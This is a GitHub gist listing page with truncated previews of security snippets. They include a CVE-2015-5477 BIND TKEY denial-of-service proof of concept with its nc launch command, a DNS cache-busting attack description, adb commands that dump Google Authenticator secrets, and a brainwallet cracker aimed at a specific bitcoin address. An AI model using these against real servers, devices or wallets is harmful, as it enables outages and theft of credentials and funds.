Skip to content

Instantly share code, notes, and snippets.

@sipherr
sipherr / gist:eeaf54fe4346d9a9669b
Created August 4, 2015 12:54
CVE-2015-5477 - bind TKEY query handling DoS Proof of concept
// CVE-2015-5477 - bind TKEY query handling DoS Proof of concept
// (sipher@utensil)(~/tkeyd)$ rm dns.txt
// (sipher@utensil)(~/tkeyd)$ gcc tkeyd.c -o tkeyd
// (sipher@utensil)(~/tkeyd)$ ./tkeyd
// (sipher@utensil)(~/tkeyd)$ nc -u 127.0.0.1 53 < dns.txt
#include <stdio.h>
int main() {
@sipherr
sipherr / gist:4416897c01e9a4a6f64a
Created April 17, 2015 21:19
hping3 DNS stress test request generator
// Generate DNS request for injection directly on the wire (Homebrew stress test)
//
// Example packet (tcpdump -lnx -i eth2 port 53):
//
// 19:21:35.494916 IP 3.1.33.7.46035 > localhost.53: 65222+ A? google.com. (28)
// 0x0000: 4500 0038 b087 0000 4011 26ae c0a8 c845
// 0x0010: 18e2 01b0 b3d3 0035 0024 a3b5 fec6 0100
// 0x0020: 0001 0000 0000 0000 0667 6f6f 676c 6503
// 0x0030: 636f 6d00 0001 0001
//
# DNS wildcard attack POC (cache busting?)
#
# DNS Server pwnage from a single host. This tool will clobber a DNS cache server.
#
# Theory
# Force a cache server to cache records for a DNS zone that will answer for non-existant domain names.. http://en.wikipedia.org/wiki/Wildcard_DNS_record
#
# Example: *.godaddy.com
#
# Running on Ubuntu
$ sudo apt-get install android-tools-adb
$ adb root
or
$ adb shell
$ ./su
$ adb pull /data/data/com.google.android.apps.authenticator2/databases/databases
$ sqlite3 ./databases "select * from accounts" &gt; /Volumes/TRUECRYPT_ENCRYPTED_VOLUME/google_authenticator_backup.txt
#!/usr/bin/python
# willwharton/pyBrainwallet, February 2013, k
# Joric/bitcoin-dev, june 2012, public domain
import hashlib
import itertools
import ctypes
import ctypes.util
import sys
import random
import BrainWallet
import re
target = "1LdChbUWYc48TQtH78CnpfnVQMpLYXH1Q1"
words = []
lens = {}
with open('dict.txt') as fh:
for s in fh.readlines():
sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386
sudo apt-get install libsm6:i386